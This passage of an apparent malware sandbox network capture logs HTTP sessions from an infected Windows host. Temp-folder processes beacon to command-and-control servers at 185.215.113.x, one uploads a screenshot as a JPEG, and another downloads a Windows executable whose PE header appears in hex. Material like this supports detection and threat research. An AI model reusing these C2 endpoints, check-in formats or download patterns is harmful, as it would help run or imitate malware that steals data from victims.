Sep 3, 2024 17:14:02.335350037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	49790	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:02.135385036 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTE2Mzg= Host: 185.215.113.19 Content-Length: 91790 Cache-Control: no-cache
Sep 3, 2024 17:14:02.135593891 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 45 32 4d 7a 67 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTE2Mzg=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:02.135593891 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:02.135593891 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:02.135683060 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:02.135696888 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:02.135696888 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:02.135696888 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:02.135756969 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:02.135756969 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:02.135776043 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:04.030782938 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	49791	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:02.529485941 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:03.358594894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:03.370471954 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:03.665421009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	49792	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:02.850718975 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:03.713069916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:03.723831892 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:04.012255907 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	49793	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:03.383855104 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 32 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000283001&unit=246122658369
Sep 3, 2024 17:14:04.330095053 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 3, 2024 17:14:04.408082962 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTE2Mzg= Host: 185.215.113.19 Content-Length: 91790 Cache-Control: no-cache
Sep 3, 2024 17:14:04.408153057 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 45 32 4d 7a 67 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTE2Mzg=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:04.408219099 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:04.408246040 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:04.408273935 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:04.408296108 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:04.408320904 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:04.408346891 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:04.408375025 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:04.408401012 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:04.408423901 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:06.429841995 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	49795	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:03.779743910 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:04.699851036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:04.894567013 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:05.173943043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	49796	185.215.113.19	80	5280	C:\Users\user\Pictures\Lighter Tech\runtime.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:03.996037006 CEST	85	OUT	GET /ProlongedPortable.dll HTTP/1.1 Host: 185.215.113.19 Connection: Keep-Alive
Sep 3, 2024 17:14:04.934418917 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:04 GMT Content-Type: application/octet-stream Content-Length: 514560 Last-Modified: Sun, 01 Sep 2024 13:24:10 GMT Connection: keep-alive ETag: "66d46afa-7da00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 4f 8e d0 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 30 00 00 d2 07 00 00 06 00 00 00 00 00 00 3e f1 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f0 07 00 4f 00 00 00 00 00 08 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELO!0> @ @@O H.textD `.rsrc@@.reloc @B HGW^YQ=(s2$(\|cFOH:<iv$:S(Ot!"Ol,^lwgdSUJJ)wIvVy^Wx'f0HgV{fUAXoOR)AT]L%cJv9}#-V%~GN'I5v;II)HqZ<+(\|M{3UatUf[
Sep 3, 2024 17:14:04.934463024 CEST	164	IN	Data Raw: 5b 66 09 d0 dc 08 06 00 00 00 00 00 00 00 00 07 00 00 00 05 05 00 00 00 08 00 00 00 05 05 00 00 00 00 00 00 01 01 00 00 00 09 00 00 00 02 02 00 00 00 0a 00 00 37 f0 f0 37 00 00 00 00 00 a4 a4 00 00 00 01 00 00 00 81 81 00 00 00 0b 0c 0d 00 00 00 Data Ascii: [f77
Sep 3, 2024 17:14:04.934529066 CEST	1236	IN	Data Raw: 16 01 00 00 00 fc fc 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 01 01 00 00 00 01 00 00 00 46 46 00 00 00 01 00 00 00 2e 2e 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 Data Ascii: FF..DD7744
Sep 3, 2024 17:14:04.934540987 CEST	1236	IN	Data Raw: 00 00 00 03 03 00 00 00 13 01 00 00 00 18 18 00 00 00 14 15 16 01 00 00 00 61 61 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 19 19 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 19 19 00 00 00 14 15 16 Data Ascii: aaAAss}}]]
Sep 3, 2024 17:14:04.934561014 CEST	1236	IN	Data Raw: 11 01 00 00 00 2f 2f 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 2f 2f 00 00 00 14 15 16 01 00 00 00 5f 5f 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 30 30 00 00 00 01 00 00 00 ec ec 00 00 00 01 00 Data Ascii: ////__001122VV3333
Sep 3, 2024 17:14:04.934758902 CEST	1236	IN	Data Raw: 00 00 00 03 03 00 00 00 13 01 00 00 00 45 45 00 00 00 14 15 16 01 00 00 00 d6 d6 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 46 46 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 46 46 00 00 00 14 15 16 Data Ascii: EEFFFF~~GGHHHHII
Sep 3, 2024 17:14:04.934772015 CEST	1236	IN	Data Raw: 00 00 5b 5b 00 00 00 14 15 16 01 00 00 00 3d 3d 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 5c 5c 00 00 00 01 00 00 00 9d 9d 00 00 00 01 00 00 00 bd bd 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 Data Ascii: [[==\\]]^^^^>>__IIii
Sep 3, 2024 17:14:04.934783936 CEST	1236	IN	Data Raw: 00 00 11 01 00 00 00 72 72 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 72 72 00 00 00 14 15 16 01 00 00 00 a1 a1 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 73 73 00 00 00 01 00 00 00 20 20 00 00 00 Data Ascii: rrrrss CCttttuuvv
Sep 3, 2024 17:14:04.934797049 CEST	1236	IN	Data Raw: 00 1b 00 00 00 06 06 00 00 00 1c 01 00 00 00 04 04 00 00 00 14 15 16 01 00 00 00 10 10 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 05 05 00 00 00 01 00 00 00 b3 b3 00 00 00 01 00 00 00 d2 d2 00 00 00 17 18 Data Ascii: ii11TT
Sep 3, 2024 17:14:04.934811115 CEST	1236	IN	Data Raw: 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 1d 1d 00 00 00 1b 00 00 00 06 06 00 00 00 1c 01 00 00 00 1d 1d 00 00 00 14 15 16 01 00 00 00 83 83 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 Data Ascii: mmMM66 LL
Sep 3, 2024 17:14:04.940511942 CEST	1236	IN	Data Raw: 00 00 1c 01 00 00 00 33 33 00 00 00 14 15 16 01 00 00 00 6d 6d 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 34 34 00 00 00 1b 00 00 00 06 06 00 00 00 1c 01 00 00 00 34 34 00 00 00 14 15 16 01 00 00 00 c9 c9 Data Ascii: 33mm44445566''JJ77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	49797	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:04.135987043 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:05.071579933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:05.113677979 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:05.386677027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	49799	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:05.406963110 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:06.217340946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	49800	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:05.648155928 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:06.484961987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:06.487368107 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:06.774702072 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	49802	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:06.303653002 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:07.199924946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	49803	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:06.640305042 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTY3MTQ= Host: 185.215.113.19 Content-Length: 96866 Cache-Control: no-cache
Sep 3, 2024 17:14:06.640305042 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 59 33 4d 54 51 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTY3MTQ=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:06.640394926 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:06.640394926 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:06.640394926 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:06.640505075 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:06.640505075 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:06.640505075 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:06.640505075 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:06.640506029 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:06.640506029 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:08.716625929 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	49804	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
